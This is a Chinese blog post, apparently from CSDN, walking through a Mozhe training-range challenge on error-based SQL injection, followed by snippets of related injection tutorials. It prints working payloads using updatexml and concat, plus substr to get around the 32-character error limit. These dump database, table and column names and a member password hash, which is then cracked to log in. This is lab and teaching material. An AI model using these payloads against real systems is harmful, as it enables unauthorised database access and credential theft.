墨者-SQL注入漏洞测试(报错盲注) 题解

最新推荐文章于 2024-08-17 22:34:52 发布
最新推荐文章于 2024-08-17 22:34:52 发布
阅读量456 收藏
点赞数
分类专栏: sql注入 靶场 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Redredredfish/article/details/121791019
版权
本文详细讲述了在未防护的MySQL系统中,通过公告界面和报错注入技巧,逐步获取数据库敏感信息的过程,包括库名、表名、字段值等,并利用这些信息进行登录。关键步骤包括字符型注入、unionselect、updatexml函数利用和字段值解析。
摘要由CSDN通过智能技术生成

靶场地址:https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe

依旧是mysql、无防护

①依旧是公告界面
url:http://219.153.49.228:44679/new_list.php?id=1
1',1' and '1'='1' -- q,1' and '1'='2' -- q判断存在字符型注入,数据库类型为MariaDB

②order by 判断字段数为4,union select无回显

③尝试报错注入,利用函数updatexml()
updatexml参数(目标xml内容,xml文档路径,更新的内容)
当文档路径包含字符~,会判断不合法,输出字符~报错
利用concat函数将子查询语句与字符~拼接
例如:concat(0x7e,(select user()))
会将查询结果拼接~报错输出
所以尝试

id=1' and updatexml(1,concat(0x7e,(select user())),1) -- q
在这里插入图片描述
判断存在报错注入

④接下来还是联合注入那一套,替换子查询语句即可

id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1) -- q
爆出库名information_schema,mysql,perfor

查询perfor库是空的
database()查询出当前数据库为stormgroup,居然不在schema_name里

爆出表名member,notice

表member爆出字段name,password,status

⑤分别查询字段值

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(字段) from member)),1) -- q

name字段:mozhe,mozhe
status字段:0,1
查询password字段时,根据另外两个字段可知有两条数据,因为报错长度最多为32位,字符~占了1位,剩下31位不够输出第一个32位的MD5密码,而且第一条数据status字段值为0,大概率用不了。
直接查询第二条数据

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(password) from member where status='1')),1) -- q
在这里插入图片描述
得到~76e59b744c5db295a5f0b66f2e9a192
依旧少了一位,利用函数substr(字符串,32,1)输出第32位字符

id=11111111' and updatexml(1,concat(0x7e,(select substr(group_concat(password),32,1) from member where status=1)),1) -- q
得到~e
拼一拼得到76e59b744c5db295a5f0b66f2e9a192e
解密得到945748
mozhe/945748登录得到key

Redredredfish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 699
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院-SQL注入漏洞测试(报错盲注)
qq_47094508的博客
06-21 329
拿到靶场后访问在用户登陆下方点击关于平台停机维护的通知点击后发现url为 http://124.70.71.251:46004/new_list.php?id=1添加单引号后报错,发现数据库为mariaDB 直接sqlmap一把梭就行了爆库名 爆表名 爆字段名 爆name和password的内容 解密 md5在线解密破解,md5解密加密 登录成功...
【CISP-PTE】SQL注入练习题
西原一点红的博客
06-26 1555
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
墨者靶场 SQL注入漏洞测试(报错盲注)通关思路
zyh1588的博客
11-01 319
小白回顾墨者靶场之sql报错注入
盲注原理基础
qq_58000413的博客
09-15 529
and substr((select table_name from information_schema.tables where table_schema=database()),1,1) >100 判断出表名。and if(ascii((substr(database(),1,1)))) 判断出数据库第一个字母的ascii值。and if(length(database())>12,0,sleep(4)) 判断出数据库长度。若需要闭合就手动帮闭合下。
墨者学院 靶场练习(一) SQL注入
a519395243的博客
12-20 8058
墨者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_42357070/article/details/81215715   进来点击公告   sqlmap 用于 mysql注入的步骤: 1:查找数据库 ./sqlmap.py ...
墨者学院--SQL注入漏洞测试(布尔盲注)
老司机开代码的博客
08-03 570
文章目录题意解析注入过程爆数据库名爆表名爆字段名 今天做了一道墨者学院的盲注题目。头皮发麻。 题意解析 要求是找出moezhe开头的32为的key。 先看一下题目: 开始一看是这个界面,第一感觉以为是post提交表单的注入漏洞,然后一顿操作猛如虎,结果人都傻了。接着,底下那个通知就一直在那晃荡,抱着试试看的心理点进去,结果就发现了新大陆。 ?id,多么亲切的老朋友啊。一下子就豁然开朗了。 通过...
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
面试中常问的SQL注入
m0_46467017的博客
08-20 2384
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节英文默认占一个字节,中文占两个字节。
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3943
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者 - SQL注入漏洞测试(时间盲注)
吃肉唐僧的博客
07-08 1398
按照题意,正规思路 flag.php?type=1%20and%20if(length(database())=12,sleep(5),1)%20--+ 通告sleep()函数判断数据长度 然后用flag.php?type=1%20and%20if(substr(database(),1,1)='s',sleep(5),1)%20--+ 用bp字典结合substr函数爆库==&gt...
SQL 注入漏洞(七)报错注入
不秃头的程序Yang
06-12 1062
一、代码分析 二、报错注入攻击 1、获取库名
MySQL注入操作流程记录
qq_40582266的博客
09-15 657
1.访问页面,找到有参数页面 页面提交:http://mozhe.cn/new_list.php?id=1 数据库执行语句:select * from news where id=1 页面返回描述:返回内容正常 分析解说:正常浏览页面,找到有参数的地方,如id。 2.注入点判断:and 1=1 / and 1=2 页面提交:http://mozhe.cn/new_list.php?id=1 and 1=1 数据库执行语句:select * from news where id=1 and 1=1 页面返回
SQL注入报错注入的一些随笔
郁离歌丶的博客
03-21 4520
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
[数据库][知识]SQL Server、MySQL 和 Oracle 的默认端口和数据库链接
最新发布
一名不太专业的程序员
08-17 327
请确保在实际使用中,根据您自己的数据库配置(如主机名、端口、数据库名、用户名和密码等)来调整上述连接信息。同时,确保已经添加了相应数据库的 JDBC 驱动到您的项目依赖中。SQL Server、MySQL 和 Oracle 的默认端口号、连接 URL 和驱动类名。请注意,SQL Server 的 JDBC URL 格式可能需要根据实际的数据库实例进行调整,例如,如果数据库实例名称不是默认的。参数用于指定字符集,如果需要其他字符集设置,可能需要调整这些参数。指定了连接的主机和端口,
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值